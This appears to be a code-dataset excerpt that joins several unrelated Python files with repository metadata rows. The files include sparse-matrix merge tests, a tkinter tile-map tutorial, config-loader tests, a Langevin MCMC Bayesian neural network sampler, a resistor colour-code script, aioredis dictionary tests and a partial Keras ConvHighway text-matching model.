Z_2 = np.random.choice(Z_set, N_2, replace=True)[:,None]
df2 = pd.DataFrame(np.concatenate((COUNTRIES, TEAMS, Z_2), 1),
columns=['COUNTRY', 'TEAM', 'Z'])
df2['PROB'] = np.random.rand(len(df2))
return df1, df2
@pytest.fixture()
def df1_sparse():
"""Sparse representation of df1."""
# Alphabetically:
# [20160404, 20160407]
# ['John', 'Toby']
rows = [0, 0, 0, 2, 2, 2, 1, 1, 1]
cols = [0, 1, 2, 0, 1, 2, 0, 1, 2]
values = [0.3, 0.2, 0.5, 0.4, 0.6, 0.0, 0.1, 0.5, 0.4]
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[4,3])
return m
@pytest.fixture()
def df2():
df = pd.DataFrame([
['England', 'Warriors', 'Z_0', 0.4],
['England', 'Warriors', 'Z_1', 0.1],
['England', 'Warriors', 'Z_4', 0.4],
['Scotland', 'Spartans', 'Z_0', 0.6],
['Scotland', 'Spartans', 'Z_1', 0.9],
['Scotland', 'Spartans', 'Z_4', 0.6],
], columns = ['COUNTRY', 'TEAM', 'Z', 'PROB'])
# Assert group by each Z and summing is 1.
return df
@pytest.fixture()
def df2_sparse():
"""Sparse representation of df2."""
# Alphabetically:
# ['England', 'Scotland']
# ['Spartans', 'Warriors']
rows = [2, 2, 2, 1, 1, 1]
cols = [0, 1, 2, 0, 1, 2]
values = [0.4, 0.1, 0.4, 0.6, 0.9, 0.6]
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[4,3])
return m
@pytest.fixture()
def df():
"""The true merge product sum value."""
df = pd.DataFrame([
[20160404, 'John', 'England', 'Warriors', 0.34],
[20160404, 'Toby', 'England', 'Warriors', 0.22],
[20160407, 'John', 'England', 'Warriors', 0.25],
[20160404, 'John', 'Scotland', 'Spartans', 0.66],
[20160404, 'Toby', 'Scotland', 'Spartans', 0.78],
[20160407, 'John', 'Scotland', 'Spartans', 0.75],
], columns = ['DATE', 'NAME', 'COUNTRY', 'TEAM',
'PROB'])
return df
@pytest.fixture()
def df_sparse():
"""Sparse representation of df where rows are (DATE, NAME) and columns
are (COUNTRY, TEAM)."""
rows = [0, 2, 1, 0, 2, 1]
cols = [2, 2, 2, 1, 1, 1]
values = [0.34, 0.22, 0.25, 0.66, 0.78, 0.75]
n_rows = 4
n_cols = 4
m = sp.sparse.coo_matrix((values, (rows, cols)), shape=[n_rows, n_cols])
return m
def merge_product_sum_pandas(df1, df2):
df = pd.merge(df1, df2, on=['Z'])
df['PROB'] = df['PROB_x']*df['PROB_y']
df.drop(['PROB_x', 'PROB_y'], axis=1, inplace=True)
df = df.groupby(['DATE', 'NAME', 'COUNTRY', 'TEAM']).sum()
df = df.reset_index()
return df
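# (Editor's note) merge_product_sum is expected to match the pandas reference above,
# but computed with sparse algebra: df1 becomes a (DATE, NAME) x Z matrix, df2 a
# (COUNTRY, TEAM) x Z matrix, and their product over the shared Z axis yields the
# summed probabilities, whose nonzero entries are mapped back to index tuples.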
def test_reverse_index_map(df1, df2, df, df_sparse):
"""Test reverse index on all our sparse matrices."""
df1_reversed = reverse_index_map(df_sparse.row,
df1.set_index(['DATE', 'NAME', 'Z']).index)
df2_reversed = reverse_index_map(df_sparse.col,
df2.set_index(['COUNTRY', 'TEAM', 'Z']).index)
assert (df[['NAME', 'DATE']] == df1_reversed).all().all()
assert (df[['TEAM', 'COUNTRY']] == df2_reversed).all().all()
def test_to_sparse(df1, df1_sparse, df2, df2_sparse):
"""Test the to_sparse function."""
idx1 = ['DATE', 'NAME']
idx2 = ['COUNTRY', 'TEAM']
m1 = to_sparse(df1.set_index(idx1 + ['Z']), idx1, ['PROB'])
m2 = to_sparse(df2.set_index(idx2 + ['Z']), idx2, ['PROB'])
assert (m1 != df1_sparse).size == 0
assert (m2 != df2_sparse).size == 0
def test_multiply_sparse(df1_sparse, df2_sparse, df_sparse):
m = multiply_sparse(df1_sparse, df2_sparse)
# Numerical error make it hard to use != and ==
assert ((m.todense() - df_sparse.todense())**2 < 1e-7).all()
def extract_prob(df):
"""Orders and extracts probability from dataframe for testing."""
col_idx = ['DATE', 'NAME', 'COUNTRY', 'TEAM']
out = df.sort_values(col_idx).reset_index(drop=True)['PROB']
return out
def test_merge_product_sum(df1, df2, df):
mps = merge_product_sum(df1, df2, on=['Z'], lindex=['DATE', 'NAME'],
rindex=['COUNTRY', 'TEAM'], lval=['PROB'],
rval=['PROB'])
mps_pandas = merge_product_sum_pandas(df1, df2)
assert ((extract_prob(mps) - extract_prob(df))**2 < 1e-7).all().all()
assert ((extract_prob(mps) - extract_prob(mps_pandas))**2 < 1e-7).all().all()
def test_merge_product_sum_large(df_large):
df1, df2 = df_large
mps = merge_product_sum(df1, df2, on=['Z'], lindex=['DATE', 'NAME'],
rindex=['COUNTRY', 'TEAM'], lval=['PROB'],
rval=['PROB'])
mps_pandas = merge_product_sum_pandas(df1, df2)
assert ((extract_prob(mps) - extract_prob(mps_pandas))**2 < 1e-7).all().all()
| true |
aafc71816f029dfcd91adbcfd725ea8f8bce19c5 | Python | veltadestiana/Data-Structure | /Tutorial 1/Tutorial 1 Solution/Tutorial1.py | UTF-8 | 1,616 | 3.78125 | 4 | [] | no_license |
"""Tutorial 1"""
# Name: [fill in your name here]
# NPM: [fill in you NPM here]
from tkinter import *
def loadMap(filename):
# Loads .map file, filters numbers only and returns a 2D array
# [TO DO]
rawfile = open(filename)
file = (rawfile.read())
file = list(filter(lambda x: x.isdigit(), file))
array = [] # array is now 1D list of numbers
for i in range(30):
# converts 1D array to 30x30 2D array
array.append(file[:30])
file = file[30:]
rawfile.close()
return array
def renderMap(mapfile):
# Accepts 2D array, creates a tkinter GUI and canvas, reads the array
# then renders a 600x600 graphic gamespace according to the array's
# values.
# [TO DO]
r = Tk()
r.title("Tutorial 1")
c = Canvas(r, width=600, height=600)
c.pack()
# Image dictionary for holding PhotoImage instances of .gif
# Available directories: ./sprite, ./sprite/emoji
imgdict = {'0':PhotoImage(file = './sprite/emoji/0.gif'),
'1':PhotoImage(file = './sprite/emoji/1.gif'),
'2':PhotoImage(file = './sprite/emoji/2.gif'),
'3':PhotoImage(file = './sprite/emoji/3.gif'),
'4':PhotoImage(file = './sprite/emoji/4.gif')}
y = 0
for line in mapfile:# iterates by row
x = 0
for i in line: # iterates by column
# array value provides index for image dict
c.create_image(15+x*20,15+y*20,image=imgdict[i])
x += 1
y+=1
r.mainloop()
# Main program
if __name__ == "__main__":
renderMap(loadMap('test.map'))
| true |
e2443de536e43569e62899b4a6693cab13c540a6 | Python | mozaiques/zombase | /tests/test_config.py | UTF-8 | 1,915 | 2.65625 | 3 | ["MIT"] | permissive |
# -*- coding: utf-8 -*-
import os
import tempfile
import unittest
from zombase import config
class AbstractTestConfig(object):
def test_common(self):
self.assertEqual(self.a_config['KEY_ONE'], 'blaé')
self.assertEqual(self.a_config['KEY_TWO'], 12)
with self.assertRaises(config.ConfigError):
self.a_config['key_three']
with self.assertRaises(config.ConfigError):
self.a_config['KEY_FOUR']
def tearDown(self):
del self.a_config
class TestDictConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
test_dict = {
'KEY_ONE': 'blaé',
'KEY_TWO': 12,
'key_three': 'non_capital'
}
self.a_config = config.Config()
self.a_config.from_dict(test_dict)
class TestObjectConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
class DummyObject(object):
pass
test_object = DummyObject()
setattr(test_object, 'KEY_ONE', 'blaé')
setattr(test_object, 'KEY_TWO', 12)
setattr(test_object, 'key_three', 'non_capital')
self.a_config = config.Config()
self.a_config.from_object(test_object)
class TestFileConfig(unittest.TestCase, AbstractTestConfig):
def setUp(self):
self.test_file = tempfile.NamedTemporaryFile(mode='wb', delete=False)
self.test_file.write(u'# -*- coding: utf-8 -*-\n'.encode('utf-8'))
self.test_file.write(u'KEY_ONE = "blaé"\n'.encode('utf-8'))
self.test_file.write(u'KEY_TWO = 12\n'.encode('utf-8'))
self.test_file.write(u'key_three = "non_capital"\n'.encode('utf-8'))
self.test_file.close()
self.a_config = config.Config()
self.a_config.from_pyfile(self.test_file.name)
def tearDown(self):
del self.a_config
os.remove(self.test_file.name)
del self.test_file
| true |
8bd194e3f98c1f4395c5d200013cef8053f964f8 | Python | rohitash-chandra/ld_bnn_pc | /ld_bnn_pc.py | UTF-8 | 18,430 | 2.65625 | 3 | [] | no_license |
#!/usr/bin/python
import matplotlib.pyplot as plt
import numpy as np
import random
import time
from scipy.stats import multivariate_normal
from scipy.stats import norm
import math
import os
from expdata import setexperimentdata
import sys
# An example of a class
class Network:
def __init__(self, Topo, Train, Test, learn_rate):
self.Top = Topo # NN topology [input, hidden, output]
self.TrainData = Train
self.TestData = Test
np.random.seed()
self.lrate = learn_rate
self.W1 = np.random.randn(self.Top[0], self.Top[1]) / np.sqrt(self.Top[0])
self.B1 = np.random.randn(1, self.Top[1]) / np.sqrt(self.Top[1]) # bias first layer
self.W2 = np.random.randn(self.Top[1], self.Top[2]) / np.sqrt(self.Top[1])
self.B2 = np.random.randn(1, self.Top[2]) / np.sqrt(self.Top[1]) # bias second layer
self.hidout = np.zeros((1, self.Top[1])) # output of first hidden layer
self.out = np.zeros((1, self.Top[2])) # output last layer
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def sampleEr(self, actualout):
error = np.subtract(self.out, actualout)
sqerror = np.sum(np.square(error)) / self.Top[2]
return sqerror
def ForwardPass(self, X):
z1 = X.dot(self.W1) - self.B1
self.hidout = self.sigmoid(z1) # output of first hidden layer
z2 = self.hidout.dot(self.W2) - self.B2
self.out = self.sigmoid(z2) # output second hidden layer
def BackwardPass(self, Input, desired):
out_delta = (desired - self.out) * (self.out * (1 - self.out))
hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))
#self.W2 += (self.hidout.T.dot(out_delta) * self.lrate)
#self.B2 += (-1 * self.lrate * out_delta)
#self.W1 += (Input.T.dot(hid_delta) * self.lrate)
#self.B1 += (-1 * self.lrate * hid_delta)
layer = 1 # hidden to output
for x in xrange(0, self.Top[layer]):
for y in xrange(0, self.Top[layer + 1]):
self.W2[x, y] += self.lrate * out_delta[y] * self.hidout[x]
for y in xrange(0, self.Top[layer + 1]):
self.B2[y] += -1 * self.lrate * out_delta[y]
layer = 0 # Input to Hidden
for x in xrange(0, self.Top[layer]):
for y in xrange(0, self.Top[layer + 1]):
self.W1[x, y] += self.lrate * hid_delta[y] * Input[x]
for y in xrange(0, self.Top[layer + 1]):
self.B1[y] += -1 * self.lrate * hid_delta[y]
def decode(self, w):
w_layer1size = self.Top[0] * self.Top[1]
w_layer2size = self.Top[1] * self.Top[2]
w_layer1 = w[0:w_layer1size]
self.W1 = np.reshape(w_layer1, (self.Top[0], self.Top[1]))
w_layer2 = w[w_layer1size:w_layer1size + w_layer2size]
self.W2 = np.reshape(w_layer2, (self.Top[1], self.Top[2]))
self.B1 = w[w_layer1size + w_layer2size:w_layer1size + w_layer2size + self.Top[1]]
self.B2 = w[w_layer1size + w_layer2size + self.Top[1]:w_layer1size + w_layer2size + self.Top[1] + self.Top[2]]
def encode(self):
w1 = self.W1.ravel()
w2 = self.W2.ravel()
w = np.concatenate([w1, w2, self.B1, self.B2])
return w
def langevin_gradient(self, data, w, depth): # BP with SGD (Stocastic BP)
self.decode(w) # method to decode w into W1, W2, B1, B2.
size = data.shape[0]
Input = np.zeros((1, self.Top[0])) # temp hold input
Desired = np.zeros((1, self.Top[2]))
fx = np.zeros(size)
for i in xrange(0, depth):
for i in xrange(0, size):
pat = i
Input = data[pat, 0:self.Top[0]]
Desired = data[pat, self.Top[0]:]
self.ForwardPass(Input)
self.BackwardPass(Input, Desired)
w_updated = self.encode()
return w_updated
def evaluate_proposal(self, data, w ): # BP with SGD (Stocastic BP)
self.decode(w) # method to decode w into W1, W2, B1, B2.
size = data.shape[0]
Input = np.zeros((1, self.Top[0])) # temp hold input
Desired = np.zeros((1, self.Top[2]))
fx = np.zeros((size,self.Top[2]))
for i in xrange(0, size): # to see what fx is produced by your current weight update
Input = data[i, 0:self.Top[0]]
self.ForwardPass(Input)
fx[i] = self.out
return fx
# --------------------------------------------------------------------------
def covert_time(secs):
if secs >= 60:
mins = str(secs/60)
secs = str(secs%60)
else:
secs = str(secs)
mins = str(00)
if len(mins) == 1:
mins = '0'+mins
if len(secs) == 1:
secs = '0'+secs
return [mins, secs]
# -------------------------------------------------------------------
class MCMC:
def __init__(self, samples, traindata, testdata, topology):
self.samples = samples # NN topology [input, hidden, output]
self.topology = topology # max epocs
self.traindata = traindata #
self.testdata = testdata
# ----------------
def rmse(self, predictions, targets):
return np.sqrt(((predictions - targets) ** 2).mean())
def likelihood_func(self, neuralnet, data, w, tausq):
y = data[:, self.topology[0]:]
fx = neuralnet.evaluate_proposal(data, w)
rmse = self.rmse(fx, y)
loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq
return [np.sum(loss), fx, rmse]
def prior_likelihood(self, sigma_squared, nu_1, nu_2, w, tausq):
h = self.topology[1] # number hidden neurons
d = self.topology[0] # number input neurons
part1 = -1 * ((d * h + h + 2) / 2) * np.log(sigma_squared)
part2 = 1 / (2 * sigma_squared) * (sum(np.square(w)))
log_loss = part1 - part2 - (1 + nu_1) * np.log(tausq) - (nu_2 / tausq)
return log_loss
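    # (Editor's note) Up to additive constants, the two functions above compute
    #   log p(y | w, tau^2) = sum_i [ -0.5*log(2*pi*tau^2) - (y_i - f(x_i; w))^2 / (2*tau^2) ]
    #   log p(w, tau^2)     = -((d*h + h + 2)/2)*log(sigma^2) - ||w||^2 / (2*sigma^2)
    #                         - (1 + nu_1)*log(tau^2) - nu_2 / tau^2
    # i.e. a Gaussian likelihood with a Gaussian prior on the weights/biases and an
    # inverse-Gamma prior on tau^2, following the referenced Chandra et al. setup.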
def sampler(self, w_limit, tau_limit, file):
start = time.time()
# ------------------- initialize MCMC
testsize = self.testdata.shape[0]
trainsize = self.traindata.shape[0]
samples = self.samples
self.sgd_depth = 1
x_test = np.linspace(0, 1, num=testsize)
x_train = np.linspace(0, 1, num=trainsize)
netw = self.topology # [input, hidden, output]
y_test = self.testdata[:, netw[0]:]
y_train = self.traindata[:, netw[0]:]
# print y_train.shape
# print y_test.shape
w_size = (netw[0] * netw[1]) + (netw[1] * netw[2]) + netw[1] + netw[2] # num of weights and bias
pos_w = np.ones((samples, w_size)) # posterior of all weights and bias over all samples
pos_tau = np.ones((samples, 1))
fxtrain_samples = np.ones((samples, trainsize, netw[2])) # fx of train data over all samples
fxtest_samples = np.ones((samples, testsize, netw[2])) # fx of test data over all samples
rmse_train = np.zeros(samples)
rmse_test = np.zeros(samples)
w = np.random.randn(w_size)
w_proposal = np.random.randn(w_size)
#step_w = 0.05; # defines how much variation you need in changes to w
#step_eta = 0.2; # exp 0
step_w = w_limit # defines how much variation you need in changes to w
step_eta = tau_limit #exp 1
# --------------------- Declare FNN and initialize
learn_rate = 0.5
neuralnet = Network(self.topology, self.traindata, self.testdata, learn_rate)
# print 'evaluate Initial w'
pred_train = neuralnet.evaluate_proposal(self.traindata, w)
pred_test = neuralnet.evaluate_proposal(self.testdata, w)
eta = np.log(np.var(pred_train - y_train))
tau_pro = np.exp(eta)
sigma_squared = 25
nu_1 = 0
nu_2 = 0
sigma_diagmat = np.zeros((w_size, w_size)) # for Equation 9 in Ref [Chandra_ICONIP2017]
np.fill_diagonal(sigma_diagmat, step_w)
delta_likelihood = 0.5 # an arbitrary position
prior_current = self.prior_likelihood(sigma_squared, nu_1, nu_2, w, tau_pro) # takes care of the gradients
[likelihood, pred_train, rmsetrain] = self.likelihood_func(neuralnet, self.traindata, w, tau_pro)
[likelihood_ignore, pred_test, rmsetest] = self.likelihood_func(neuralnet, self.testdata, w, tau_pro)
# print likelihood
naccept = 0
# print 'begin sampling using mcmc random walk'
# plt.plot(x_train, y_train)
# plt.plot(x_train, pred_train)
# plt.title("Plot of Data vs Initial Fx")
# plt.savefig('mcmcresults/begin.png')
# plt.clf()
#plt.plot(x_train, y_train)
for i in range(samples - 1):
w_gd = neuralnet.langevin_gradient(self.traindata, w.copy(), self.sgd_depth) # Eq 8
print(sum(w_gd))
w_proposal = w_gd + np.random.normal(0, step_w, w_size) # Eq 7
w_prop_gd = neuralnet.langevin_gradient(self.traindata, w_proposal.copy(), self.sgd_depth)
# print(multivariate_normal.pdf(w, w_prop_gd, sigma_diagmat),multivariate_normal.pdf(w_proposal, w_gd, sigma_diagmat))
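            # (Editor's note) Hastings correction for the asymmetric Langevin proposal:
            # both forward and reverse proposals are Gaussians centred on the
            # gradient-updated weights, so log q(w | w_proposal) - log q(w_proposal | w)
            # enters the acceptance ratio below.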
            diff_prop = np.log(multivariate_normal.pdf(w, w_prop_gd, sigma_diagmat)) - np.log(multivariate_normal.pdf(w_proposal, w_gd, sigma_diagmat))
eta_pro = eta + np.random.normal(0, step_eta, 1)
tau_pro = math.exp(eta_pro)
[likelihood_proposal, pred_train, rmsetrain] = self.likelihood_func(neuralnet, self.traindata, w_proposal,
tau_pro)
[likelihood_ignore, pred_test, rmsetest] = self.likelihood_func(neuralnet, self.testdata, w_proposal,
tau_pro)
# likelihood_ignore refers to parameter that will not be used in the alg.
prior_prop = self.prior_likelihood(sigma_squared, nu_1, nu_2, w_proposal,
tau_pro) # takes care of the gradients
diff_prior = prior_prop - prior_current
diff_likelihood = likelihood_proposal - likelihood
diff = min(700, diff_prior + diff_likelihood + diff_prop)
# print()
# print(diff, i )
mh_prob = min(1, math.exp(diff))
# print(mh_prob)
u = random.uniform(0, 1)
if u < mh_prob:
# Update position
# print i, ' is accepted sample'
naccept += 1
likelihood = likelihood_proposal
prior_current = prior_prop
w = w_proposal
eta = eta_pro
elapsed_time = ":".join(covert_time(int(time.time()-start)))
# sys.stdout.write('\r' + file + ' : ' + str("{:.2f}".format(float(i) / (samples - 1) * 100)) + '% complete....'+" time elapsed: " + elapsed_time)
# print likelihood, prior_current, diff_prop, rmsetrain, rmsetest, w, 'accepted'
#print w_proposal, 'w_proposal'
#print w_gd, 'w_gd'
#print w_prop_gd, 'w_prop_gd'
pos_w[i + 1,] = w_proposal
pos_tau[i + 1,] = tau_pro
fxtrain_samples[i + 1,] = pred_train
fxtest_samples[i + 1,] = pred_test
rmse_train[i + 1,] = rmsetrain
rmse_test[i + 1,] = rmsetest
#plt.plot(x_train, pred_train)
else:
pos_w[i + 1,] = pos_w[i,]
pos_tau[i + 1,] = pos_tau[i,]
fxtrain_samples[i + 1,] = fxtrain_samples[i,]
fxtest_samples[i + 1,] = fxtest_samples[i,]
rmse_train[i + 1,] = rmse_train[i,]
rmse_test[i + 1,] = rmse_test[i,]
# print i, 'rejected and retained'
# sys.stdout.write('\r' + file + ' : 100% ..... Total Time: ' + ":".join(covert_time(int(time.time()-start))))
# print naccept, ' num accepted'
# print naccept / (samples * 1.0), '% was accepted'
accept_ratio = naccept / (samples * 1.0) * 100
# plt.title("Plot of Accepted Proposals")
# plt.savefig('mcmcresults/proposals.png')
# plt.savefig('mcmcresults/proposals.svg', format='svg', dpi=600)
# plt.clf()
return (pos_w, pos_tau, fxtrain_samples, fxtest_samples, x_train, x_test, rmse_train, rmse_test, accept_ratio)
def main():
filenames = ["Iris", "Wine", "Cancer", "Heart", "CreditApproval", "Baloon", "TicTac", "Ions", "Zoo",
"Lenses", "Balance"]
problemlist = np.array(range(11))
input = np.array([4, 13, 9, 13, 15, 4, 9, 34, 16, 4, 4])
hidden = np.array([6, 6, 6, 16, 20, 5, 30, 8, 6, 5, 8])
output = np.array([2, 3, 1, 1, 1, 1, 1, 1, 7, 3, 3])
samplelist = [5000, 8000, 10000, 20000, 15000, 5000, 20000, 5000, 3000, 5000, 2000]
x = 3
filetrain = open('Results/train.txt', 'r')
filetest = open('Results/test.txt', 'r')
filestdtr = open('Results/std_tr.txt','r')
filestdts = open('Results/std_ts.txt', 'r')
train_accs = np.loadtxt(filetrain)
test_accs = np.loadtxt(filetest)
train_stds = np.loadtxt(filestdtr)
test_stds = np.loadtxt(filestdts)
filetrain.close()
filetest.close()
filestdtr.close()
filestdts.close()
if x == 3:
w_limit = 0.02
tau_limit = 0.2
#if x == 4:
#w_limit = 0.02
#tau_limit = 0.1
for problem in []:
#if os.path.isfile("Results/"+filenames[problem]+"_rmse.txt"):
# print filenames[problem]
        # continue
[traindata, testdata, baseNet] = setexperimentdata(problem)
topology = [input[problem], hidden[problem], output[problem]]
random.seed(time.time())
numSamples = samplelist[problem] # need to decide yourself
mcmc = MCMC(numSamples, traindata, testdata, topology) # declare class
[pos_w, pos_tau, fx_train, fx_test, x_train, x_test, rmse_train, rmse_test, accept_ratio] = mcmc.sampler(w_limit, tau_limit, filenames[problem])
        print '\nsuccessfully sampled: ' + str(accept_ratio) + ' samples accepted'
burnin = 0.1 * numSamples # use post burn in samples
pos_w = pos_w[int(burnin):, ]
pos_tau = pos_tau[int(burnin):, ]
print("fx shape:"+str(fx_test.shape))
print("fx_train shape:"+ str(fx_train.shape))
fx_mu = fx_test.mean(axis=0)
fx_high = np.percentile(fx_test, 95, axis=0)
fx_low = np.percentile(fx_test, 5, axis=0)
fx_mu_tr = fx_train.mean(axis=0)
fx_high_tr = np.percentile(fx_train, 95, axis=0)
fx_low_tr = np.percentile(fx_train, 5, axis=0)
pos_w_mean = pos_w.mean(axis=0)
# np.savetxt(outpos_w, pos_w_mean, fmt='%1.5f')
rmse_tr = np.mean(rmse_train[int(burnin):])
rmsetr_std = np.std(rmse_train[int(burnin):])
rmse_tes = np.mean(rmse_test[int(burnin):])
rmsetest_std = np.std(rmse_test[int(burnin):])
# print rmse_tr, rmsetr_std, rmse_tes, rmsetest_std
# np.savetxt(outres, (rmse_tr, rmsetr_std, rmse_tes, rmsetest_std, accept_ratio), fmt='%1.5f')
ytestdata = testdata[:, input[problem]:]
ytraindata = traindata[:, input[problem]:]
train_acc = []
test_acc = []
for fx in fx_train:
count = 0
for index in range(fx.shape[0]):
if np.allclose(fx[index],ytraindata[index],atol = 0.2):
count += 1
train_acc.append(float(count)/fx.shape[0]*100)
for fx in fx_test:
count = 0
for index in range(fx.shape[0]):
if np.allclose(fx[index],ytestdata[index],atol = 0.5):
count += 1
test_acc.append(float(count)/fx.shape[0]*100)
train_acc = np.array(train_acc[int(burnin):])
train_std = np.std(train_acc[int(burnin):])
test_acc = np.array(test_acc[int(burnin):])
test_std = np.std(test_acc[int(burnin):])
train_acc_mu = train_acc.mean()
test_acc_mu = test_acc.mean()
train_accs[problem] = train_acc_mu
test_accs[problem] = test_acc_mu
train_stds[problem] = train_std
test_stds[problem] = test_std
testResults = np.c_[ytestdata, fx_mu, fx_high, fx_low]
trainResults = np.c_[ytraindata, fx_mu_tr, fx_high_tr, fx_low_tr]
        # Write the RMSE summary for this problem to a text file
with open("Results/" +
filenames[problem] + "_rmse" + ".txt", 'w') as fil:
rmse = [rmse_tr, rmsetr_std, rmse_tes, rmsetest_std]
rmse = "\t".join(list(map(str, rmse))) + "\n"
fil.write(rmse)
n_groups = len(filenames)
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.2
opacity = 0.8
capsize = 3
filetrain = open('Results/train.txt', 'w+')
filetest = open('Results/test.txt', 'w+')
filestdtr = open('Results/std_tr.txt','w+')
filestdts = open('Results/std_ts.txt', 'w+')
np.savetxt(filetrain, train_accs, fmt='%2.2f')
np.savetxt(filestdtr, train_stds, fmt='%2.2f')
np.savetxt(filetest, test_accs, fmt='%2.2f')
np.savetxt(filestdts, test_stds, fmt='%2.2f')
filetrain.close()
filetest.close()
filestdtr.close()
filestdts.close()
print(train_accs)
plt.bar(index + float(bar_width)/2, train_accs, bar_width,
alpha = opacity,
error_kw = dict(elinewidth=1, ecolor='r'),
yerr = train_stds,
color = 'c',
label = 'train')
plt.bar(index + float(bar_width)/2 + bar_width, test_accs, bar_width,
alpha = opacity,
error_kw = dict(elinewidth=1, ecolor='g'),
yerr = test_stds,
color = 'b',
label = 'test')
plt.xlabel('Datasets')
plt.ylabel('Accuracy')
plt.xticks(index+bar_width, filenames, rotation=70)
plt.legend()
plt.tight_layout()
plt.savefig('barplt.png')
plt.show()
if __name__ == "__main__": main()
| true |
70b459dec76842c983f4bb9e12983abcbe5737d1 | Python | yuseungwoo/baekjoon | /1076.py | UTF-8 | 326 | 3.609375 | 4 | [] | no_license |
# coding: utf-8
color = ['black', 'brown', 'red', 'orange', 'yellow', 'green', 'blue', 'violet', 'grey',
'white']
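# Resistor colour code: value = (first_band_digit * 10 + second_band_digit) * 10 ** multiplier_band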
input_list = []
for _ in range(3):
input_list.append(input())
num = ""
num += str(color.index(input_list[0])) + str(color.index(input_list[1]))
print(int(num) * 10**color.index(input_list[2]))
| true |
d3a39f7e23511b50e718a68b24fe9ed528e515fe | Python | ramjet-labs/aioredis | /tests/coerced_keys_dict_test.py | UTF-8 | 1,201 | 2.8125 | 3 | ["MIT"] | permissive |
import pytest
from aioredis.util import coerced_keys_dict
def test_simple():
d = coerced_keys_dict()
assert d == {}
d = coerced_keys_dict({b'a': 'b', b'c': 'd'})
assert 'a' in d
assert b'a' in d
assert 'c' in d
assert b'c' in d
assert d == {b'a': 'b', b'c': 'd'}
def test_invalid_init():
d = coerced_keys_dict({'foo': 'bar'})
assert d == {'foo': 'bar'}
assert 'foo' not in d
assert b'foo' not in d
with pytest.raises(KeyError):
d['foo']
with pytest.raises(KeyError):
d[b'foo']
d = coerced_keys_dict()
d.update({'foo': 'bar'})
assert d == {'foo': 'bar'}
assert 'foo' not in d
assert b'foo' not in d
with pytest.raises(KeyError):
d['foo']
with pytest.raises(KeyError):
d[b'foo']
def test_valid_init():
d = coerced_keys_dict({b'foo': 'bar'})
assert d == {b'foo': 'bar'}
assert 'foo' in d
assert b'foo' in d
assert d['foo'] == 'bar'
assert d[b'foo'] == 'bar'
d = coerced_keys_dict()
d.update({b'foo': 'bar'})
assert d == {b'foo': 'bar'}
assert 'foo' in d
assert b'foo' in d
assert d['foo'] == 'bar'
assert d[b'foo'] == 'bar'
| true |
e4a00ef6b98528f42b4d4f8447bcb62ce46829fd | Python | jiniaoxu/matchzoo-lite | /matchzoo/models/conv_highway.py | UTF-8 | 8,447 | 2.734375 | 3 | ["Apache-2.0"] | permissive |
"""An implementation of Conv-Highway Model."""
import typing
import keras
from keras import backend as K
from matchzoo import engine
from matchzoo import preprocessors
class ConvHighway(engine.BaseModel):
"""
ConvHighway Model.
Examples:
>>> model = ConvHighway()
>>> model.params['encode_filters'] = 128
>>> model.params['encode_kernel_sizes'] = [3, 4, 5]
>>> model.params['decode_filters'] = 128
>>> model.params['decode_kernel_size'] = 3
>>> model.params['conv_activation_func'] = 'relu'
>>> model.params['pool_size'] = 2
>>> model.params['mlp_num_layers'] = 1
>>> model.params['mlp_num_units'] = 200
>>> model.params['mlp_num_fan_out'] = 100
>>> model.params['mlp_activation_func'] = 'relu'
>>> model.params['dropout_rate'] = 0.5
>>> model.guess_and_fill_missing_params(verbose=0)
>>> model.build()
"""
@classmethod
def get_default_params(cls) -> engine.ParamTable:
""":return: model default parameters."""
params = super().get_default_params(
with_embedding=True,
with_multi_layer_perceptron=True
)
params['optimizer'] = 'adam'
params.add(engine.Param(name='encode_filters', value=128,
desc="The filter size of each convolution "
"blocks for encode."))
params.add(engine.Param(name='encode_kernel_sizes', value=[3],
desc="The kernel size of each convolution "
"blocks for the encode."))
params.add(engine.Param(name='decode_filters', value=128,
desc="The filter size of each convolution "
"blocks for decode."))
params.add(engine.Param(name='decode_kernel_size', value=3,
desc="The kernel size of each convolution "
"blocks for the decode."))
params.add(engine.Param(name='conv_activation_func', value='relu',
desc="The activation function in the "
"convolution layer."))
        params.add(engine.Param(name='pool_size', value=4,
                                desc="The pool size of the max pooling layer."))
params.add(engine.Param(
name='padding',
value='same',
hyper_space=engine.hyper_spaces.choice(
['same', 'valid', 'causal']),
desc="The padding mode in the convolution layer. It should be one"
"of `same`, `valid`, and `causal`."
))
params.add(engine.Param(
'dropout_rate', 0.0,
hyper_space=engine.hyper_spaces.quniform(
low=0.0, high=0.8, q=0.01),
desc="The dropout rate."
))
return params
def build(self):
"""
Build model structure.
        ConvHighway uses a Siamese architecture.
"""
input_left, input_right = self._make_inputs()
mask_left = keras.layers.Lambda(lambda x: K.cast(x, K.tf.bool))(input_left)
mask_right = keras.layers.Lambda(lambda x: K.cast(x, K.tf.bool))(input_right)
embedding = self._make_embedding_layer()
embed_left = embedding(input_left)
embed_right = embedding(input_right)
# encode
encode_left = self._conv_highway_block(
embed_left,
self._params['encode_filters'],
self._params['encode_kernel_sizes'],
self._params['padding'],
self._params['conv_activation_func']
)
encode_right = self._conv_highway_block(
embed_right,
self._params['encode_filters'],
self._params['encode_kernel_sizes'],
self._params['padding'],
self._params['conv_activation_func']
)
attention_layer = keras.layers.Lambda(ConvHighway.bi_attention)
attn = attention_layer([encode_left, encode_right, mask_left, mask_right])
# decode
decode = self._conv_pool_block(
attn,
self._params['decode_filters'],
self._params['decode_kernel_size'],
self._params['padding'],
self._params['conv_activation_func'],
self._params['pool_size']
)
output = keras.layers.Flatten()(decode)
dropout = keras.layers.Dropout(
rate=self._params['dropout_rate'])(output)
mlp = self._make_multi_layer_perceptron_layer()(dropout)
inputs = [input_left, input_right]
x_out = self._make_output_layer()(mlp)
self._backend = keras.Model(inputs=inputs, outputs=x_out)
def _conv_pool_block(
self,
input_: typing.Any,
filters: int,
kernel_size: int,
padding: str,
conv_activation_func: str,
pool_size: int
) -> typing.Any:
output = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation=conv_activation_func
)(input_)
output = keras.layers.MaxPooling1D(pool_size=pool_size)(output)
return output
def _conv_highway_block(
self,
input_: typing.Any,
filters: int,
